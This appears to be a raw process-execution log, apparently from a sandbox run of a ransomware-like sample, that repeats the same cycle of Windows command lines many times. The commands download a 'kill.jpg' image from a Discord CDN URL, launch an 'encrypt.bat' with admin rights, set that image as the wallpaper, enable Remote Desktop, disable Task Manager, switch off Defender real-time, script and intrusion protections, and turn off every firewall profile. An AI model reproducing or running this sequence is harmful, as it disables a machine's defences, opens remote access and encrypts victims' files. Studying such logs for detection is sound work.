powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

